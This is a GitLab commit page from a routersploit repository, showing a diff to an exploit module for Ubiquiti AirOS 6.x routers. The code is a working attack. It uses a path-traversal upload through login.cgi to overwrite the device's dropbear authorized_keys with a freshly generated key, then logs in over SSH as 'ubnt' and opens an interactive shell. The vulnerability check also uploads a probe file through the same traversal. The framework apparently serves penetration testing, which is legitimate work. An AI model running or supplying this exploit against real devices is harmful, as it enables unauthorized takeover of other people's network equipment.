Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
24cb2588
Commit
24cb2588
authored
Apr 27, 2016
by
root
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Added interactive SSH Shell functionality
parent
0b8359ce
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
80 additions
and
34 deletions
+80
-34
airos_6_x.py
routersploit/modules/exploits/ubiquiti/airos_6_x.py
+80
-34
No files found.
routersploit/modules/exploits/ubiquiti/airos_6_x.py
View file @
24cb2588
import
string
,
random
,
requests
,
tempfile
,
os
.
path
import
requests
,
tempfile
,
os
.
path
import
paramiko
,
StringIO
,
termios
,
tty
,
sys
,
select
,
socket
from
routersploit
import
(
from
routersploit
import
(
exploits
,
exploits
,
print_success
,
print_success
,
...
@@ -36,7 +37,7 @@ class Exploit(exploits.Exploit):
...
@@ -36,7 +37,7 @@ class Exploit(exploits.Exploit):
}
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. https://192.168.1.1'
)
#Target address
target
=
exploits
.
Option
(
''
,
'Target address e.g. https://192.168.1.1'
)
#Target address
port
=
exploits
.
Option
(
80
,
'Target port
'
)
#Default port
port
=
exploits
.
Option
(
443
,
'Target port e.g. 443
'
)
#Default port
#Disable certificate verification warnings
#Disable certificate verification warnings
requests
.
packages
.
urllib3
.
disable_warnings
()
requests
.
packages
.
urllib3
.
disable_warnings
()
...
@@ -46,37 +47,86 @@ class Exploit(exploits.Exploit):
...
@@ -46,37 +47,86 @@ class Exploit(exploits.Exploit):
print_success
(
'Target is vulnerable'
)
print_success
(
'Target is vulnerable'
)
print_success
(
'Trying to exploit by uploading SSH public key'
)
print_success
(
'Trying to exploit by uploading SSH public key'
)
if
(
os
.
path
.
isfile
(
os
.
path
.
expanduser
(
'~/.ssh/id_rsa.pub'
))):
key
=
paramiko
.
RSAKey
.
generate
(
1024
)
upload_params
=
{
'file'
:
(
'../../etc/dropbear/authorized_keys'
,
open
(
os
.
path
.
expanduser
(
'~/.ssh/id_rsa.pub'
)),
{
'Expect'
:
''
})}
public_key
=
key
.
get_base64
()
private_key
=
StringIO
.
StringIO
()
try
:
key
.
write_private_key
(
private_key
)
url
=
sanitize_url
(
'{0}:{1}/'
.
format
(
self
.
target
,
self
.
port
))
requests
.
post
(
url
+
'login.cgi'
,
files
=
upload_params
,
verify
=
False
)
except
Exception
,
e
:
tmp_file_pubkey
=
tempfile
.
TemporaryFile
()
print
e
tmp_file_pubkey
.
write
(
'ssh-rsa '
+
public_key
)
print_error
(
'Something wrong happened while uploading SSH public key'
)
tmp_file_pubkey
.
seek
(
0
)
else
:
upload_params
=
{
'file'
:
(
'../../etc/dropbear/authorized_keys'
,
tmp_file_pubkey
,
{
'Expect'
:
''
})}
print_success
(
'Appareantly the exploit worked fine'
)
print_success
(
'Try the following command to connect to router'
)
ip_target
=
self
.
target
.
replace
(
'https://'
,
''
)
upload_url
=
sanitize_url
(
'{0}:{1}/login.cgi'
.
format
(
self
.
target
,
self
.
port
))
ip_target
=
ip_target
.
replace
(
'http://'
,
'/'
)
response
=
http_request
(
url
=
upload_url
,
method
=
'POST'
,
files
=
upload_params
)
ip_target
=
ip_target
.
replace
(
'/'
,
''
)
print_info
(
'ssh {0} -l ubnt'
.
format
(
ip_target
))
if
(
response
is
None
):
print_error
(
'Something was wrong while uploading the SSH Public Key'
)
return
else
:
print_success
(
'Appareantly the exploit worked fine'
)
print_error
(
'The SSH public key does not exist. You must to generate it'
)
print_success
(
'Trying to invoke a interactive SSH Shell'
)
client
=
paramiko
.
SSHClient
()
client
.
set_missing_host_key_policy
(
paramiko
.
AutoAddPolicy
())
pseudo_privkey_file
=
StringIO
.
StringIO
(
private_key
.
getvalue
())
pkey
=
paramiko
.
RSAKey
.
from_private_key
(
pseudo_privkey_file
)
pseudo_privkey_file
.
close
()
ip_target
=
self
.
target
.
replace
(
'https://'
,
''
)
ip_target
=
ip_target
.
replace
(
'http://'
,
''
)
ip_target
=
ip_target
.
replace
(
'/'
,
''
)
client
.
connect
(
ip_target
,
22
,
username
=
'ubnt'
,
pkey
=
pkey
)
# invoking interactive shell
chan
=
client
.
invoke_shell
()
oldtty
=
termios
.
tcgetattr
(
sys
.
stdin
)
try
:
tty
.
setraw
(
sys
.
stdin
.
fileno
())
tty
.
setcbreak
(
sys
.
stdin
.
fileno
())
chan
.
settimeout
(
0.0
)
while
(
True
):
r
,
w
,
e
=
select
.
select
([
chan
,
sys
.
stdin
],
[],
[])
if
(
chan
in
r
):
try
:
x
=
unicode
(
chan
.
recv
(
1024
))
if
(
len
(
x
)
==
0
):
sys
.
stdout
.
write
(
'
\r\n
Exiting...
\r\n
'
)
break
sys
.
stdout
.
write
(
x
)
sys
.
stdout
.
flush
()
except
socket
.
timeout
:
pass
if
(
sys
.
stdin
in
r
):
x
=
sys
.
stdin
.
read
(
1
)
if
(
len
(
x
)
==
0
):
break
chan
.
send
(
x
)
finally
:
termios
.
tcsetattr
(
sys
.
stdin
,
termios
.
TCSADRAIN
,
oldtty
)
private_key
.
close
()
else
:
else
:
print_error
(
'Target is not vulnerable'
)
print_error
(
'Target is not vulnerable'
)
@mute
@mute
def
check
(
self
):
def
check
(
self
):
url
=
sanitize_url
(
'{0}:{1}/'
.
format
(
self
.
target
,
self
.
port
))
base_url
=
sanitize_url
(
'{0}:{1}/'
.
format
(
self
.
target
,
self
.
port
))
response
=
http_request
(
url
=
url
+
'login.cgi'
,
method
=
'GET'
)
upload_url
=
base_url
+
'login.cgi'
response
=
http_request
(
url
=
upload_url
,
method
=
'GET'
)
if
(
response
is
None
):
if
(
response
is
None
):
return
False
#Target not vulnerable
return
False
#Target not vulnerable
...
@@ -89,29 +139,25 @@ class Exploit(exploits.Exploit):
...
@@ -89,29 +139,25 @@ class Exploit(exploits.Exploit):
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
tmp_payload
,
{
'Expect'
:
''
})}
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
tmp_payload
,
{
'Expect'
:
''
})}
try
:
response
=
http_request
(
url
=
upload_url
,
method
=
'POST'
,
files
=
upload_params
)
requests
.
post
(
url
+
'login.cgi'
,
files
=
upload_params
,
verify
=
False
)
tmp_payload
.
close
()
tmp_payload
.
close
()
except
requests
.
exceptions
.
RequestException
:
if
(
response
is
None
):
tmp_payload
.
close
()
return
False
#Target not vulnerable
return
False
#Target not vulnerable
#Response to verify if the upload was done correctly
#Response to verify if the upload was done correctly
verify_upload
=
http_request
(
url
=
url
+
'airview.uavr'
,
method
=
'GET'
)
airview_url
=
base_url
+
'airview.uavr'
verify_upload
=
http_request
(
url
=
airview_url
,
method
=
'GET'
)
#Upload empty file to "clear" the airview.uavr file
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file
=
tempfile
.
TemporaryFile
()
clean_tmp_file
=
tempfile
.
TemporaryFile
()
clean_tmp_file
.
write
(
''
)
clean_tmp_file
.
seek
(
0
)
clean_tmp_file
.
seek
(
0
)
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
clean_tmp_file
,
{
'Expect'
:
''
})}
upload_params
=
{
'file'
:
(
'../../../../tmp/airview.uavr'
,
clean_tmp_file
,
{
'Expect'
:
''
})}
try
:
http_request
(
url
=
upload_url
,
method
=
'POST'
,
files
=
upload_params
)
requests
.
post
(
url
+
'login.cgi'
.
format
(
self
.
target
),
files
=
upload_params
,
verify
=
False
)
clean_tmp_file
.
close
()
clean_tmp_file
.
close
()
except
requests
.
exceptions
.
RequestException
:
clean_tmp_file
.
close
()
if
(
'vulnerable'
+
rand_str
in
verify_upload
.
text
):
if
(
'vulnerable'
+
rand_str
in
verify_upload
.
text
):
return
True
return
True
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment
